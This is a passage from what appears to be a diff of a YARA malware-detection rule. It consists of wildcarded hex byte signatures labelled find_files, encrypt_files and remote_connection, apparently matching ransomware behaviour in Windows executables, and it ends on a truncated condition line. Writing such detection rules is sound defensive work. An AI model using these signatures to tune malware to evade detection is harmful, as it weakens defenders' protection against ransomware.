?? ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7 - 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 57 C0 8B 43 ?? 66 0F D6 - } - $find_files_p2 = { - 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C6 45 - ?? ?? 8B 3B 85 FF 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8B 47 ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 47 ?? 89 7D ?? E8 ?? ?? ?? ?? 6A - ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B - C8 74 ?? 83 78 ?? ?? 8D 48 ?? 72 ?? 8B 09 FF 70 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51 - 50 FF 15 ?? ?? ?? ?? 8B C8 89 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8B D8 66 66 - 0F 1F 84 00 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? - 8B 8D ?? ?? ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C6 00 ?? 8D 41 ?? 83 79 ?? ?? 72 - ?? 8B 00 FF 71 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 8B D0 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 8D 85 ?? ?? ?? ?? 51 - 50 8B CA E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 F6 85 ?? - ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 FF FF B7 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 81 FF ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? - ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 83 CB ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 50 89 9D ?? ?? ?? ?? 89 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 - } - $find_files_p3 = { - 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 - ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 - 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? 83 7D ?? ?? 8D - 8D ?? ?? ?? ?? FF 75 ?? 0F 43 55 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B - 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? - 8B 5D ?? 8D 55 ?? 53 FF B5 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 85 ?? - ?? ?? ?? 8B 40 ?? 85 FF 0F 85 ?? ?? ?? ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? - 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 - ?? 0F 1F 80 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D - } - $find_files_p4 = { - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? - ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 - 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 - 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F - 43 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? - 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D - 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? - 8B FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D - ?? 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? - 8D 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 - } - $find_files_p5 = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8D 55 ?? 83 7D ?? ?? 8B 4D ?? 0F 43 55 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 83 F9 ?? - 72 ?? 49 83 C8 ?? 3B C8 89 4D ?? 0F 42 C1 03 C2 0F 1F 40 ?? 80 38 ?? 75 ?? 0F B6 08 - 80 F9 ?? 75 ?? 33 C9 EB ?? 1B C9 83 C9 ?? 85 C9 74 ?? 3B C2 74 ?? 48 EB ?? 2B C2 EB - ?? 83 C8 ?? 6A ?? 8D 78 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C6 45 ?? ?? - 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? - ?? ?? 3B C7 0F 82 ?? ?? ?? ?? 2B C7 C7 45 ?? ?? ?? ?? ?? 83 C9 ?? 89 45 ?? 83 F8 ?? - 0F 42 C8 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 03 C7 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 8D ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - } - $find_files_p6 = { - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 07 - ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 47 - ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F 43 - 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 - DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D - ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B - FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? - 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D - 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? - 33 FF 66 66 0F 1F 84 00 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF B7 ?? ?? ?? ?? 0F 43 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? - ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 83 FF - ?? 72 ?? 8B 5D ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? - ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 - } - $find_files_p7 = { - 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01 - EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ?? - 50 8B CE E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 8D - ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 - 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01 - EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ?? - 50 8B CE E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? ?? ?? ?? 3B - } - $find_files_p8 = { - C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 - ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 74 ?? 8D 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 DB 8B 85 ?? - ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F - 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? - 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 - ?? 8B 01 85 C0 74 ?? 90 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01 - EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? E9 ?? - ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 8B D8 8B 7D ?? 85 FF 74 ?? 8B 3F 8B CB E8 ?? - ?? ?? ?? 3B C7 74 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? CC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 43 ?? 3B 45 ?? 75 ?? 8D - } - $find_files_p9 = { - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? EB ?? 32 - DB 8B 85 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? - C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? C6 45 ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 0F 84 ?? - ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? - F7 D9 1B C9 23 C8 74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B - 01 8B 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? - ?? E9 ?? ?? ?? ?? 83 FB ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? - ?? ?? 8B 7E ?? 8D 4D ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8 74 ?? - 8B 01 85 C0 74 ?? 66 0F 1F 44 00 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B - } - $find_files_p10 = { - 40 ?? 89 01 EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB - ?? 50 8B CE E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? - ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? - 75 ?? 33 FF 6A ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F - 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B - 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 - } - $encrypt_files_p1 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 55 8B 6C 24 ?? 56 8B - 74 24 ?? 57 8B 7C 24 ?? 85 F6 0F 8E ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? - 83 C4 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 57 E8 - ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? - ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 4C 24 ?? 8B C1 - 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? - 83 C4 ?? 85 C0 75 ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A - ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 - ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 85 C0 75 - } - $encrypt_files_p2 = { - E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 33 C9 - 85 F6 7E ?? 8D 56 ?? 53 8B 5C 24 ?? 03 D7 66 0F 1F 44 00 ?? 8A 04 19 8D 52 ?? 41 88 - 42 ?? 3B CE 7C ?? 5B 8D 44 24 ?? 89 74 24 ?? 50 8B 44 24 ?? 57 6A ?? 6A ?? 6A ?? FF - 70 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? - ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 44 - 24 ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? FF 74 24 ?? 57 E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 C8 ?? 5F 5E 5D 8B 4C 24 ?? 33 CC - E8 ?? ?? ?? ?? 83 C4 ?? C3 8B 74 24 ?? 56 57 55 E8 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 8B C6 5F 5E 5D - 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 - } - $remote_connection_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? E8 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? - E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B D8 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 - C4 ?? 49 90 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? 83 3D ?? ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 89 41 ?? 8B F2 A1 ?? ?? ?? ?? 89 - 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? - ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 - 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - 8B F2 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 66 90 8A 02 42 84 - C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1 E9 ?? F3 A5 8B - CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? - ?? ?? ?? 8B F3 89 01 66 A1 ?? ?? ?? ?? 66 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 8A 03 43 - 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B DE 4F 8A 47 ?? 47 84 C0 75 ?? 8B CB C1 E9 ?? F3 A5 - 8B CB 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 8D 49 ?? 84 C0 75 ?? A1 ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 8B F2 89 01 A1 ?? ?? ?? ?? 89 41 ?? A0 ?? ?? ?? ?? 88 41 ?? 0F - } - $remote_connection_p2 = { - 1F 44 00 ?? 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? - 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 0F 1F 00 8A 41 ?? 8D - 49 ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 - ?? A0 ?? ?? ?? ?? 6A ?? 88 41 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 45 - ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 51 ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? - ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 - DB 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 - 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 56 - FF 15 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF B5 ?? ?? ?? ?? FF D7 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B - 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : 